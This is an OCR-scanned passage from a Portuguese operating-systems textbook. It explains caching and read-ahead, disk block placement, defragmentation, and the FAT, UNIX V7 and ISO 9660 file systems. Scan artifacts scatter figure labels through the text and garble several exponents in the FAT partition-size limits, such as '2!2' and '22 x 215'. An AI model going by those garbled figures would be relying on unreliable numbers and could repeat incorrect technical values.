movido da cache. Com uma cache de escrita direta, há 
um acesso de disco para cada caractere escrito. É claro, 
a maioria dos programas trabalha com buffer interno, 
então eles normalmente não escrevem um caractere, 
mas uma linha ou unidade maior em cada chamada de 
sistema write. 

Uma consequência dessa diferença na estratégia de 
cache é que apenas remover um disco de um sistema 
UNIX sem realizar sync quase sempre resultará em da- 
dos perdidos, e frequentemente um sistema de arquivos 
corrompido também. Com as caches de escrita direta 
não há problema algum. Essas estratégias diferentes fo- 
ram escolhidas porque o UNIX foi desenvolvido em um 
ambiente no qual todos os discos eram rígidos e não 
removíveis, enquanto o primeiro sistema de arquivos 
Windows foi herdado do MS-DOS, que teve seu início 
no mundo dos discos flexíveis. Como os discos rígidos 
tornaram-se a norma, a abordagem UNIX, com sua efi- 
ciência melhor (mas pior confiabilidade), tornou-se a 
norma, e também é usada agora no Windows para dis- 
cos rígidos. No entanto, o NTFS toma outras medidas 
(por exemplo, journaling) para incrementar a confiabi- 
lidade, como discutido anteriormente. 


Alguns sistemas operacionais integram a cache de 
buffer com a cache de páginas. Isso é especialmente 
atraente quando arquivos mapeados na memória são 
aceitos. Se um arquivo é mapeado na memória, então 
algumas das suas páginas podem estar na memória por 
causa de uma paginação por demanda. Tais páginas di- 
ficilmente são diferentes dos blocos de arquivos na ca- 
che do buffer. Nesse caso, podem ser tratadas da mesma 
maneira, com uma cache única para ambos os blocos de 
arquivos e páginas. 


Leitura antecipada de blocos 


Uma segunda técnica para melhorar o desempenho 
percebido do sistema de arquivos é tentar transferir 
blocos para a cache antes que eles sejam necessários 
para aumentar a taxa de acertos. Em particular, muitos 
arquivos são lidos sequencialmente. Quando se pede 
a um sistema de arquivos para obter o bloco k em um 
arquivo, ele o faz, mas quando termina, faz uma breve 
verificação na cache para ver se o bloco k + 1 já está 
ali. Se não estiver, ele programa uma leitura para o blo- 
co k + 1 na esperança de que, quando ele for necessá- 
rio, já terá chegado na cache. No mínimo, ele já estará 
a caminho. 

É claro, essa estratégia de leitura antecipada funcio- 
na apenas para arquivos que estão de fato sendo lidos 
sequencialmente. Se um arquivo estiver sendo acessa- 
do aleatoriamente, a leitura antecipada não ajuda. Na 
realidade, ela piora a situação, pois emperra a largura 
de banda do disco, fazendo leituras em blocos inúteis 
e removendo blocos potencialmente úteis da cache (e 
talvez emperrando mais ainda a largura de banda escre- 
vendo os blocos de volta para o disco se eles estiverem 
sujos). Para ver se a leitura antecipada vale a pena ser 
feita, o sistema de arquivos pode monitorar os padrões 
de acesso para cada arquivo aberto. Por exemplo, um bit 
associado com cada arquivo pode monitorar se o arqui- 
vo está em “modo de acesso sequencial” ou “modo de 
acesso aleatório”. De início, é dado o benefício da du- 
vida para o arquivo e ele é colocado no modo de acesso 
sequencial. No entanto, sempre que uma busca é feita, 
o bit é removido. Se as leituras sequenciais começarem 
de novo, o bit é colocado em 1 novamente. Dessa ma- 
neira, o sistema de arquivos pode formular um palpite 
razoável sobre se ele deve ler antecipadamente ou não. 
Se ele cometer algum erro de vez em quando, não é um 
desastre, apenas um pequeno desperdício de largura de 
banda de disco. 
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Redução do movimento do braço do disco 


A cache e a leitura antecipada não são as únicas 
maneiras de incrementar o desempenho do sistema de 
arquivos. Outra técnica importante é reduzir o montan- 
te de movimento do braço do disco colocando blocos 
que têm mais chance de serem acessados em sequên- 
cia próximos uns dos outros, de preferência no mesmo 
cilindro. Quando um arquivo de saída é escrito, o sis- 
tema de arquivos tem de alocar os blocos um de cada 
vez, conforme a demanda. Se os blocos livres forem 
registrados em um mapa de bits, e todo o mapa de bits 
estiver na memória principal, será bastante fácil esco- 
lher um bloco livre o mais próximo possível do bloco 
anterior. Com uma lista de blocos livres, na qual uma 
parte está no disco, é muito mais dificil alocar blocos 
próximos juntos. 

No entanto, mesmo com uma lista de blocos livres, 
algum agrupamento de blocos pode ser conseguido. O 
truque é monitorar o armazenamento do disco, não em 
blocos, mas em grupos de blocos consecutivos. Se todos 
os setores consistirem em 512 bytes, o sistema poderia 
usar blocos de 1 KB (2 setores), mas alocar o armaze- 
namento de disco em unidades de 2 blocos (4 setores). 
Isso não é o mesmo que ter blocos de disco de 2 KB, já 
que a cache ainda usaria blocos de 1 KB e as transfe- 
rências de disco ainda seriam de 1 KB, mas a leitura de 
um arquivo sequencialmente em um sistema de outra 
maneira ocioso reduziria o número de buscas por um 
fator de dois, melhorando consideravelmente o desem- 
penho. Uma variação sobre o mesmo tema é levar em 
consideração o posicionamento rotacional. Quando alo- 
ca blocos, o sistema faz uma tentativa de colocar blocos 
consecutivos em um arquivo no mesmo cilindro. 

Outro gargalo de desempenho em sistemas que usam 
i-nodes (ou qualquer equivalente a eles) é que a leitura 
mesmo de um arquivo curto exige dois acessos de dis- 
co: um para o i-node e outro para o bloco. A localização 
usual do i-node é mostrada da Figura 4.29(a). Aqui to- 
dos os i-nodes estão próximos do início do disco, então 
a distância média entre um i-node e seus blocos será 
metade do número de cilindros, exigindo longas buscas. 

Uma melhora simples de desempenho é colocar os 
i-nodes no meio do disco, em vez de no início, redu- 
zindo assim a busca média entre o i-node e o primei- 
ro bloco por um fator de dois. Outra ideia, mostrada 
na Figura 4.29(b), é dividir o disco em grupos de ci- 
lindros, cada um com seus próprios i-nodes, blocos 
e lista de livres (MCKUSICK et al., 1984). Ao criar 
um arquivo novo, qualquer i-node pode ser escolhido, 
mas uma tentativa é feita para encontrar um bloco no 
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lei WB] (a) I-nodes posicionados no início do disco. (b) Disco dividido em grupos de cilindros, cada um com seus próprios blocos 
e i-nodes. 
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mesmo grupo de cilindros que o i-node. Se nenhum 
estiver disponível, então um bloco em um grupo de ci- 
lindros próximo é usado. 

É claro, o movimento do braço do disco e o tem- 
po de rotação são relevantes somente se o disco os 
tem. Mais e mais computadores vêm equipados com 
discos de estado sólido (SSDs — Solid State Disks) 
que não têm parte móvel alguma. Para esses discos, 
construídos com a mesma tecnologia dos flash cards, 
acessos aleatórios são tão rápidos quanto os sequen- 
ciais e muitos dos problemas dos discos tradicionais 
deixam de existir. Infelizmente, surgem novos proble- 
mas. Por exemplo, SSDs têm propriedades peculiares 
em suas operações de leitura, escrita e remoção. Em 
particular, cada bloco pode ser escrito apenas um nú- 
mero limitado de vezes, portanto um grande cuidado 
é tomado para dispersar uniformemente o desgaste 
sobre o disco. 


4.4.5 Desfragmentação de disco 


Quando o sistema operacional é inicialmente instala- 
do, os programas e os arquivos que ele precisa são ins- 
talados de modo consecutivo começando no início do 
disco, cada um seguindo diretamente o anterior. Todo o 
espaço de disco livre está em uma única unidade conti- 
gua seguindo os arquivos instalados. No entanto, à medi- 
da que o tempo passa, arquivos são criados e removidos, 
e o disco prejudica-se com a fragmentação, com arqui- 
vos e espaços vazios por toda parte. Em consequência, 
quando um novo arquivo é criado, os blocos usados para 
isso podem estar espalhados por todo o disco, resultando 
em um desempenho ruim. 

O desempenho pode ser restaurado movendo os ar- 
quivos a fim de deixá-los contíguos e colocando todo 
(ou pelo menos a maior parte) o espaço livre em uma 
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ou mais regiões contíguas no disco. O Windows tem um 
programa, defrag, que faz precisamente isso. Os usuá- 
rios do Windows devem executá-lo com regularidade, 
exceto em SSDs. 

A desfragmentação funciona melhor em sistemas de 
arquivos que têm bastante espaço livre em uma região 
contígua ao fim da partição. Esse espaço permite que o 
programa de desfragmentação selecione arquivos frag- 
mentados próximos do início da partição e copie todos 
os seus blocos para o espaço livre. Fazê-lo libera um 
bloco contíguo de espaço próximo do início da partição 
na qual o original ou outros arquivos podem ser coloca- 
dos contiguamente. O processo pode então ser repetido 
com o próximo pedaço de espaço de disco etc. 

Alguns arquivos não podem ser movidos, incluindo 
o arquivo de paginação, o arquivo de hibernação e o log 
de journaling, pois a administração que seria necessária 
para fazê-lo daria mais trabalho do que seu valor. Em 
alguns sistemas, essas áreas são contíguas e de tamanho 
fixo de qualquer maneira, então elas não precisam ser 
desfragmentadas. O único momento em que sua falta de 
mobilidade é um problema é quando elas estão localiza- 
das próximas do fim da partição e o usuário quer reduzir 
o tamanho da partição. A única maneira de solucionar 
esse problema é removê-las completamente, redimen- 
sionar a partição e então recriá-las depois. 

Os sistemas de arquivos Linux (especialmente ext2 e 
ext3) geralmente sofrem menos com a desfragmentação 
do que os sistemas Windows pela maneira que os blo- 
cos de discos são selecionados, então a desfragmenta- 
ção manual raramente é exigida. Também, os SSDs não 
sofrem de maneira alguma com a fragmentação. Na re- 
alidade, desfragmentar um SSD é contraprodutivo. Não 
apenas não há ganho em desempenho, como os SSDs se 
desgastam; portanto, desfragmentá-los apenas encurta 
sua vida. 


4.5 Exemplos de sistemas de arquivos 


Nas próximas seções discutiremos vários exemplos 
de sistemas de arquivos, desde os bastante simples aos 
mais sofisticados. Como os sistemas de arquivos UNIX 
modernos e o sistema de arquivos nativo do Windows 
8 são cobertos no capítulo sobre o UNIX (Capítulo 10) 
e no capítulo sobre o Windows 8 (Capítulo 11), não os 
cobriremos aqui. Examinaremos, no entanto, seus pre- 
decessores a seguir. 


4.5.1 O sistema de arquivos do MS-DOS 


O sistema de arquivos do MS-DOS é o sistema com o 
qual os primeiros PCs da IBM vinham instalados. Foi o 
principal sistema de arquivos até o Windows 98 e o Win- 
dows ME. Ainda é aceito no Windows 2000, Windows 
XP e Windows Vista, embora não seja mais padrão nos 
novos PCs exceto para discos flexíveis. No entanto, ele 
e uma extensão dele (FAT-32) tornaram-se amplamente 
usados para muitos sistemas embarcados. Muitos players 
de MP3 o usam exclusivamente, além de câmeras digi- 
tais. O popular iPod da Apple o usa como o sistema de 
arquivos padrão, embora hackers que conhecem do as- 
sunto conseguem reformatar o iPod e instalar um sistema 
de arquivos diferente. Desse modo, o número de disposi- 
tivos eletrônicos usando o sistema de arquivos MS-DOS 
é muito maior agora do que em qualquer momento no 
passado e, decerto, muito maior do que o número usando 
o sistema de arquivos NTFS mais moderno. Por essa ra- 
zão somente, vale a pena examiná-lo em detalhe. 

Para ler um arquivo, um programa de MS-DOS deve 
primeiro fazer uma chamada de sistema open para abri- 
-lo. A chamada de sistema open especifica um cami- 
nho, o qual pode ser absoluto ou relativo ao diretório 
de trabalho atual. O caminho é analisado componente 
a componente até que o diretório final seja localizado e 
lido na memória. Ele então é vasculhado para encontrar 
o arquivo a ser aberto. 

Embora os diretórios de MS-DOS tenham tama- 
nhos variáveis, eles usam uma entrada de diretório de 
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32 bytes de tamanho fixo. O formato de uma entrada 
de diretório de MS-DOS é mostrado na Figura 4.30. 
Ele contém o nome do arquivo, atributos, data e ho- 
rário de criação, bloco de partida e tamanho exato do 
arquivo. Nomes de arquivos mais curtos do que 8 + 3 
caracteres são ajustados à esquerda e preenchidos com 
espaços à direita, separadamente em cada campo. O 
campo Atributos é novo e contém bits para indicar que 
um arquivo é somente de leitura, precisa ser arquivado, 
está escondido ou é um arquivo de sistema. Arquivos 
somente de leitura não podem ser escritos. Isso é para 
protegê-los de danos acidentais. O bit arquivado não 
tem uma função de sistema operacional real (isto é, o 
MS-DOS não o examina ou o altera). A intenção é per- 
mitir que programas de arquivos em nível de usuário o 
desliguem quando efetuarem o backup de um arquivo e 
que os outros programas o liguem quando modificarem 
um arquivo. Dessa maneira, um programa de backup 
pode apenas examinar o bit desse atributo em cada ar- 
quivo para ver quais arquivos devem ser copiados. O 
bit oculto pode ser alterado para evitar que um arqui- 
vo apareça nas listagens de diretório. Seu uso principal 
é evitar confundir usuários novatos com arquivos que 
eles possam não compreender. Por fim, o bit sistema 
também oculta arquivos. Além disso, arquivos de siste- 
ma não podem ser removidos acidentalmente usando o 
comando del. Os principais componentes do MS-DOS 
têm esse bit ligado. 

A entrada de diretório também contém a data e o ho- 
rário em que o arquivo foi criado ou modificado pela 
última vez. O tempo é preciso apenas até +2 segundos, 
pois ele está armazenado em um campo de 2 bytes, que 
pode armazenar somente 65.536 valores únicos (um dia 
contém 86.400 segundos). O campo do tempo é subdi- 
vidido em segundos (5 bits), minutos (6 bits) e horas (5 
bits). A data conta em dias usando três subcampos: dia 
(5 bits), mês (4 bits) e ano — 1980 (7 bits). Com um 
número de 7 bits para o ano e o tempo começando em 
1980, o maior valor que pode ser representado é 2107. 
Então, o MS-DOS tem um problema Y2108 em si. Para 
evitar a catástrofe, seus usuários devem atentar para esse 
problema o mais cedo possível. Se o MS-DOS tivesse 
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usado os campos data e horário combinados como um 
contador de 32 bits, ele teria representado cada segundo 
exatamente e atrasado a catástrofe até 2116. 

O MS-DOS armazena o tamanho do arquivo como 
um número de 32 bits, portanto na teoria os arquivos 
podem ser de até 4 GB. No entanto, outros limites (des- 
critos a seguir) restringem o tamanho máximo do arqui- 
vo a 2 GB ou menos. Uma parte surpreendentemente 
grande da entrada (10 bytes) não é usada. 

O MS-DOS monitora os blocos de arquivos me- 
diante uma tabela de alocação de arquivos na memória 
principal. A entrada do diretório contém o número do 
primeiro bloco de arquivos. Esse número é usado como 
um índice em uma FAT de 64 K entradas na memória 
principal. Seguindo o encadeamento, todos os blocos 
podem ser encontrados. A operação da FAT está ilustra- 
da na Figura 4.12. 

O sistema de arquivos FAT vem em três versões: FAT- 
-12, FAT-16 e FAT-32, dependendo de quantos bits um 
endereço de disco contém. Na realidade, FAT-32 não é 
um nome adequado, já que apenas os 28 bits menos sig- 
nificativos dos endereços de disco são usados. Ele de- 
veria chamar-se FAT-28, mas as potências de dois soam 
bem melhor. 

Outra variante do sistema de arquivos FAT é 0 exFAT, 
que a Microsoft introduziu para dispositivos removíveis 
grandes. A Apple licenciou o exFAT, de maneira que há 
um sistema de arquivos moderno que pode ser usado 
para transferir arquivos entre computadores Windows e 
OS X. Como o exFAT é de propriedade da Microsoft e a 
empresa não liberou a especificação, não o discutiremos 
mais aqui. 

Para todas as FATs, o bloco de disco pode ser alte- 
rado para algum múltiplo de 512 bytes (possivelmente 
diferente para cada partição), com o conjunto de ta- 
manhos de blocos permitidos (chamado cluster sizes 
— tamanhos de aglomerado — pela Microsoft) sendo 
diferente para cada variante. A primeira versão do MS- 
-DOS usava a FAT-12 com blocos de 512 bytes, dando 
um tamanho de partição máximo de 2!2 x 512 bytes (na 
realidade somente 4086 x 512 bytes, pois 10 dos en- 
dereços de disco foram usados como marcadores espe- 
ciais, como fim de arquivo, bloco defeituoso etc.). Com 
esses parâmetros, o tamanho de partição de disco má- 
ximo era em torno de 2 MB e o tamanho da tabela FAT 
na memória era de 4096 entradas de 2 bytes cada. Usar 
uma entrada de tabela de 12 bits teria sido lento demais. 

Esse sistema funcionava bem para discos flexíveis, 
mas quando os discos rígidos foram lançados, ele tor- 
nou-se um problema. A Microsoft solucionou o proble- 
ma permitindo tamanhos de blocos adicionais de 1 KB, 


2 KB e 4 KB. Essa mudança preservou a estrutura e o 
tamanho da tabela FAT-12, mas permitiu partições de 
disco de até 16 MB. 

Como o MS-DOS dava suporte para quatro partições 
de disco por unidade de disco, o novo sistema de ar- 
quivos FAT-12 funcionava para discos de até 64 MB. 
Além disso, algo tinha de ceder. O que aconteceu foi 
a introdução do FAT-16, com ponteiros de disco de 
16 bits. Adicionalmente, tamanhos de blocos de 8 KB, 
16 KB e 32 KB foram permitidos. (32.768 é a maior 
potência de dois que pode ser representada em 16 bits.) 
A tabela FAT-16 ocupava 128 KB de memória principal 
o tempo inteiro, mas com as memórias maiores então 
disponíveis, ela era amplamente usada e logo substituiu 
o sistema de arquivos FAT-12. A maior partição de dis- 
co a que o FAT-16 pode dar suporte é 2 GB (64 K en- 
tradas de 32 KB cada) e o maior disco, 8 GB, a saber 
quatro partições de 2 GB cada. Por um bom tempo, isso 
foi o suficiente. 

Mas não para sempre. Para cartas comerciais, esse 
limite não é um problema, mas para armazenar vídeos 
digitais usando o padrão DV, um arquivo de 2 GB 
contém apenas um pouco mais de 9 minutos de vídeo. 
Como um disco de PC suporta apenas quatro partições, 
o maior vídeo que pode ser armazenado em disco é 
de mais ou menos 38 minutos, não importa o tama- 
nho do disco. Esse limite também significa que o maior 
vídeo que pode ser editado on-line é de menos de 
19 minutos, pois ambos os arquivos de entrada e saída 
são necessários. 

A partir da segunda versão do Windows 95, foi intro- 
duzido o sistema de arquivos FAT-32 com seus endere- 
ços de disco de 28 bits e a versão do MS-DOS subjacente 
ao Windows 95 foi adaptada para dar suporte à FAT-32. 
Nesse sistema, as partições poderiam ser teoricamente 
22 x 215 bytes, mas na realidade elas eram limitadas a 2 
TB (2048 GB), pois internamente o sistema monitora os 
tamanhos de partições em setores de 512 bytes usando 
um número de 32 bits, e 2° x 22 é 2 TB. O tamanho 
máximo da partição para vários tamanhos de blocos e 
todos os três tipos FAT é mostrado na Figura 4.31. 

Além de dar suporte a discos maiores, o sistema 
de arquivos FAT-32 tem duas outras vantagens sobre 
o FAT-16. Primeiro, um disco de 8 GB usando FAT-32 
pode ter uma única partição. Usando o FAT-16 ele tem 
quatro partições, o que aparece para o usuário do Win- 
dows como C:, D:, E: e F: unidades de disco lógicas. 
Cabe ao usuário decidir qual arquivo colocar em qual 
unidade e monitorar o que está onde. 

A outra vantagem do FAT-32 sobre o FAT-16 é que 
para um determinado tamanho de partição de disco, um 
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tamanho de bloco menor pode ser usado. Por exemplo, 
para uma partição de disco de 2 GB, o FAT-16 deve usar 
blocos de 32 KB; de outra maneira, com apenas 64K 
endereços de disco disponíveis, ele não pode cobrir toda 
a partição. Em comparação, o FAT-32 pode usar, por 
exemplo, blocos de 4 KB para uma partição de disco 
de 2 GB. A vantagem de um tamanho de bloco menor 
é que a maioria dos arquivos é muito mais curta do que 
32 KB. Se o tamanho do bloco for 32 KB, um arquivo 
de 10 bytes imobiliza 32 KB de espaço de disco. Se o 
arquivo médio for, digamos, 8 KB, então com um bloco 
de 32 KB, três quartos do disco serão desperdiçados, 
o que não é uma maneira muito eficiente de se usar o 
disco. Com um arquivo de 8 KB e um bloco de 4 KB, 
não há desperdício de disco, mas o preço pago é mais 
RAM consumida pelo FAT. Com um bloco de 4 KB e 
uma partição de disco de 2 GB, há 512 K blocos, de ma- 
neira que o FAT precisa ter 512K entradas na memória 
(ocupando 2 MB de RAM). 

O MS-DOS usa a FAT para monitorar blocos de dis- 
co livres. Qualquer bloco que no momento não esteja 
alocado é marcado com um código especial. Quando o 
MS-DOS precisa de um novo bloco de disco, ele pes- 
quisa a FAT para uma entrada contendo esse código. 
Desse modo, não são necessários nenhum mapa de bits 
ou lista de livres. 


4.5.2 O sistema de arquivos do UNIX V7 


Mesmo as primeiras versões do UNIX tinham um 
sistema de arquivos multiusuário bastante sofisticado, já 
que era derivado do MULTICS. A seguir discutiremos o 
sistema de arquivos V7, aquele do PDP-11 que tornou o 
UNIX famoso. Examinaremos um sistema de arquivos 
UNIX moderno no contexto do Linux no Capítulo 10. 
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O sistema de arquivos tem forma de uma árvore co- 
meçando no diretório-raiz, com a adição de ligações, 
formando um gráfico orientado acíclico. Nomes de ar- 
quivos podem ter até 14 caracteres e contêm quaisquer 
caracteres ASCII exceto / (porque se trata de um separa- 
dor entre componentes em um caminho) e NUL (pois é 
usado para preencher os espaços que sobram nos nomes 
mais curtos que 14 caracteres). NUL tem o valor numé- 
rico de 0. 

Uma entrada de diretório UNIX contém uma entra- 
da para cada arquivo naquele diretório. Cada entrada 
é extremamente simples, pois o UNIX usa o esquema 
i-node ilustrado na Figura 4.13. Uma entrada de dire- 
tório contém apenas dois campos: o nome do arquivo 
(14 bytes) e o número do i-node para aquele arquivo (2 
bytes), como mostrado na Figura 4.32. Esses parâme- 
tros limitam o número de arquivos por sistema a 64 K. 

Assim como o i-node da Figura 4.13, o i-node do 
UNIX contém alguns atributos. Os atributos contêm o 
tamanho do arquivo, três horários (criação, último aces- 
so e última modificação), proprietário, grupo, informa- 
ção de proteção e uma contagem do número de entradas 
de diretórios que apontam para o i-node. Este último 
campo é necessário para as ligações. Sempre que uma 
ligação nova é feita para um i-node, o contador no i- 
-node é incrementado. Quando uma ligação é removida, 
o contador é decrementado. Quando ele chega a 0, o i- 
-node é reivindicado e os blocos de disco são colocados 
de volta na lista de livres. 

O monitoramento dos blocos de disco é feito usando 
uma generalização da Figura 4.13 a fim de lidar com 
arquivos muito grandes. Os primeiros 10 endereços de 
disco são armazenados no próprio i-node, então para 
pequenos arquivos, todas as informações necessárias 
estão diretamente no i-node, que é buscado do disco 
para a memória principal quando o arquivo é aberto. 
Para arquivos um pouco maiores, um dos endereços no 
i-node é o de um bloco de disco chamado bloco indire- 
to simples. Esse bloco contém endereços de disco adi- 
cionais. Se isso ainda não for suficiente, outro endereço 
no i-node, chamado bloco indireto duplo, contém o 
endereço de um bloco com uma lista de blocos indiretos 
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simples. Cada um desses blocos indiretos simples apon- 
ta para algumas centenas de blocos de dados. Se mesmo 
isso nao for suficiente, um bloco indireto triplo tam- 
bém pode ser usado. O quadro completo é dado na Fi- 
gura 4.33. 

Quando um arquivo é aberto, o sistema deve tomar 
o nome do arquivo fornecido e localizar seus blocos de 
disco. Vamos considerar como o nome do caminho /usr/ 
ast/mbox é procurado. Usaremos o UNIX como exem- 
plo, mas o algoritmo é basicamente o mesmo para todos 
os sistemas de diretórios hierárquicos. Primeiro, o sis- 
tema de arquivos localiza o diretório-raiz. No UNIX o 
seu i-node está localizado em um local fixo no disco. 
A partir desse i-node, ele localiza o diretório-raiz, que 
pode estar em qualquer lugar, mas digamos bloco 1. 

Em seguida, ele lê o diretório-raiz e procura o primei- 
ro componente do caminho, usr, no diretório-raiz para 
encontrar o número do i-node do arquivo /usr. Localizar 
um i-node a partir desse número é algo direto, já que cada 
i-node tem uma localização fixa no disco. A partir desse 
i-node, o sistema localiza o diretório para /usr e pesquisa 
o componente seguinte, ast, nele. Quando encontrar a en- 
trada para ast, ele terá o i-node para o diretório /usr/ast. A 
partir desse i-node ele pode fazer uma busca no próprio 
diretório e localizar mbox. O i-node para esse arquivo é 
então lido na memória e mantido ali até o arquivo ser fe- 
chado. O processo de busca está ilustrado na Figura 4.34. 

Nomes de caminhos relativos são procurados da 
mesma maneira que os absolutos, apenas partindo 
do diretório de trabalho em vez de do diretório-raiz. 
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Todo diretório tem entradas para . e .. que são colo- 
cadas ali quando o diretório é criado. A entrada . tem 
o número de i-node para o diretório atual, e a entrada 
para .. tem o número de i-node para o diretório pai. 
Desse modo, uma rotina procurando ../dick/prog.c 
apenas procura .. no diretório de trabalho, encontra o 
número de i-node do diretório pai e busca pelo dire- 
tório dick. Nenhum mecanismo especial é necessário 
para lidar com esses nomes. No que diz respeito ao 
sistema de diretórios, eles são apenas cadeias ASCII 
comuns, como qualquer outro nome. A única questão 
a ser observada aqui é que .. no diretório-raiz aponta 
para si mesmo. 


4.5.3 Sistemas de arquivos para CD-ROM 


Como nosso último exemplo de um sistema de arqui- 
vos, vamos considerar aqueles usados nos CD-ROMs. 
Eles são particularmente simples, pois foram projeta- 
dos para meios de escrita única. Entre outras coisas, por 
exemplo, eles não têm provisão para monitorar blocos 
livres, pois em um arquivo de CD-ROM arquivos não 
podem ser liberados ou adicionados após o disco ter 
sido fabricado. A seguir examinaremos o principal tipo 
de sistema de arquivos para CD-ROMs e duas de suas 
extensões. Embora os CD-ROMs estejam ultrapassa- 
dos, eles são também simples, e os sistemas de arquivos 
usados em DVDs e Blu-ray são baseados nos usados 
para CD-ROMs. 


Endereços de 
blocos de dado 


Bloco 
indireto 
triplo 
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I-node 26 
I-node 6 Bloco 132 é para Bloco 406 
Diretório-raiz é para /usr é o diretório /usr /ust/ast é o diretório /usr/ast 








I-node 6 I-node 26 
Procurar usr diz que /usr/ast diz que /usr/ast/mbox 
resulta no /usr esta no está no i-node /usr/ast esta no está no i-node 
i-node 6 bloco 132 26 bloco 406 60 


Alguns anos após o CD-ROM ter feito sua estreia, 
foi introduzido o CD-R (CD Recordable — CD gra- 
vável). Diferentemente do CD-ROM, ele permite adi- 
cionar arquivos após a primeira gravação, que são 
apenas adicionados ao final do CD-R. Arquivos nunca 
são removidos (embora o diretório possa ser atualizado 
para esconder arquivos existentes). Como consequência 
desse sistema de arquivos “somente adicionar”, as pro- 
priedades fundamentais não são alteradas. Em particu- 
lar, todo o espaço livre encontra-se em uma única parte 
contigua no fim do CD. 


O sistema de arquivos ISO 9660 


O padrão mais comum para sistemas de arquivos 
de CD-ROM foi adotado como um Padrão Internacio- 
nal em 1988 sob o nome ISO 9660. Virtualmente, todo 
CD-ROM no mercado é compatível com esse padrão, às 
vezes com extensões a serem discutidas a seguir. Uma 
meta desse padrão era tornar todo CD-ROM legível em 
todos os computadores, independente do ordenamento de 
bytes e do sistema operacional usado. Em conseguência, 
algumas limitações foram aplicadas ao sistema de arqui- 
vos para possibilitar que os sistemas operacionais mais 
fracos (como MS-DOS) pudessem lê-los. 

Os CD-ROMs não têm cilindros concêntricos como 
os discos magnéticos. Em vez disso, há uma única espiral 
contínua contendo os bits em uma sequência linear (em- 
bora seja possível buscar transversalmente às espirais). 
Os bits ao longo da espiral são divididos em blocos ló- 
gicos (também chamados setores lógicos) de 2352 bytes. 
Alguns desses bytes são para preambulos, correção de er- 
ros e outros destinos. A porção líquida (payload) de cada 
bloco lógico é 2048 bytes. Quando usados para música, 


os CDs têm as posições iniciais, finais e espaços entre 
as trilhas, mas eles não são usados para CD-ROMs de 
dados. Muitas vezes a posição de um bloco ao longo da 
espiral é representada em minutos e segundos. Ela pode 
ser convertida para um número de bloco linear usando o 
fator de conversão de 1 s = 75 blocos. 

O ISO 9660 dá suporte a conjuntos de CD-ROM 
com até 2!º — 1 CDs no conjunto. Os CD-ROMs indivi- 
duais também podem ser divididos em volumes lógicos 
(partições). No entanto, a seguir, nos concentraremos no 
ISO 9660 para um único CD-ROM não particionado. 

Todo CD-ROM começa com 16 blocos cuja fun- 
ção não é definida pelo padrão ISO 9660. Um fa- 
bricante de CD-ROMs poderia usar essa área para 
oferecer um programa de inicialização que permitisse 
que o computador fosse inicializado pelo CD-ROM, 
ou para algum outro propósito nefando. Em seguida 
vem um bloco contendo o descritor de volume pri- 
mário, que contém algumas informações gerais sobre 
o CD-ROM. Entre essas informações estão o identifi- 
cador do sistema (32 bytes), o identificador do volu- 
me (32 bytes), o identificador do editor (128 bytes) e 
o identificador do preparador dos dados (128 bytes). 
O fabricante pode preencher esses campos da manei- 
ra que quiser, exceto que somente letras maiúsculas, 
dígitos e um número muito pequeno de caracteres de 
pontuação podem ser usados para assegurar a compa- 
tibilidade entre as plataformas. 

O descritor do volume primário também contém os 
nomes de três arquivos, que podem conter um resumo, 
uma notificação de direitos autorais e informações bi- 
bliográficas, respectivamente. Além disso, determina- 
dos números-chave também estão presentes, incluindo 
o tamanho do bloco lógico (normalmente 2048, mas 
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4096, 8192 e valores maiores de potências de 2 são per- 
mitidos em alguns casos), o número de blocos no CD- 
-ROM e as datas de criação e expiração do CD-ROM. 
Por fim, o descritor do volume primário também contém 
uma entrada de diretório para o diretório-raiz, dizendo 
onde encontrá-lo no CD-ROM (isto é, em qual bloco ele 
começa). A partir desse diretório, o resto do sistema de 
arquivos pode ser localizado. 

Além do descritor de volume primário, um CD-ROM 
pode conter um descritor de volume complementar. Ele 
contém informações similares ao descritor primário, 
mas não abordaremos essa questão aqui. 

O diretório-raiz, e todos os outros diretórios, quanto 
a isso, consistem em um número variável de entradas, 
a última das quais contém um bit marcando-a como a 
entrada final. As entradas de diretório em si também são 
de tamanhos variáveis. Cada entrada de diretório con- 
siste em 10 a 12 campos, dos quais alguns são em ASCII 
e outros são numéricos binários. Os campos binários 
são codificados duas vezes, uma com os bits menos sig- 
nificativos nos primeiros bytes — little-endian (usados 
nos Pentiums, por exemplo) e outra com os bits mais 
significativos nos primeiros bytes — big endian (usados 
nas SPARCS, por exemplo). Desse modo, um número de 
16 bits usa 4 bytes e um número de 32 bits usa 8 bytes. 

O uso dessa codificação redundante era necessário 
para evitar ferir os sentimentos alheios quando o padrão 
foi desenvolvido. Se o padrão tivesse estabelecido little- 
-endian, então as pessoas de empresas cujos produtos 
eram big-endian se sentiriam desvalorizadas e não te- 
riam aceitado o padrão. O conteúdo emocional de um 
CD-ROM pode, portanto, ser quantificado e mensurado 
exatamente em quilobytes/hora de espaço desperdiçado. 

O formato de uma entrada de diretório ISO 9660 
está ilustrado na Figura 4.35. Como entradas de dire- 
tório têm comprimentos variáveis, o primeiro campo é 
um byte indicando o tamanho da entrada. Esse byte é 
definido com o bit de ordem mais alta à esquerda para 
evitar qualquer ambiguidade. 

Entradas de diretório podem opcionalmente ter atri- 
butos estendidos. Se essa prioridade for usada, o segun- 
do byte indicará o tamanho dos atributos estendidos. 
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to Tamanho do registro de atributos estendidos 
Tamanho da entrada de diretório 


Em seguida vem o bloco inicial do próprio arquivo. 
Arquivos são armazenados como sequências contíguas 
de blocos, assim a localização de um arquivo é com- 
pletamente especificada pelo bloco inicial e o tamanho, 
que está contido no próximo campo. 

A data e o horário em que o CD-ROM foi gravado 
estão armazenados no próximo campo, com bytes se- 
parados para o ano, mês, dia, hora, minuto, segundo e 
zona do fuso horário. Os anos começam a contar em 
1900, o que significa que os CD-ROMs sofrerão de um 
problema Y2156, pois o ano seguinte a 2155 será 1900. 
Esse problema poderia ter sido postergado com a defi- 
nição da origem do tempo em 1988 (o ano que o padrão 
foi adotado). Se isso tivesse ocorrido, o problema teria 
sido postergado até 2244. Cada 88 anos extras ajuda. 

O campo Flags contém alguns bits diversos, incluin- 
do um para ocultar a entrada nas listagens (um atributo 
copiado do MS-DOS), um para distinguir uma entrada 
que é um arquivo de uma entrada que é um diretório, 
um para capacitar o uso dos atributos estendidos e um 
para marcar a última entrada em um diretório. Alguns 
outros bits também estão presentes nesse campo, mas 
não os abordaremos aqui. O próximo campo lida com a 
intercalação de partes de arquivos de uma maneira que 
não é usada na versão mais simples do ISO 9660, por- 
tanto não nos aprofundaremos nela. 

O campo a seguir diz em qual CD-ROM o arquivo 
está localizado. É permitido que uma entrada de dire- 
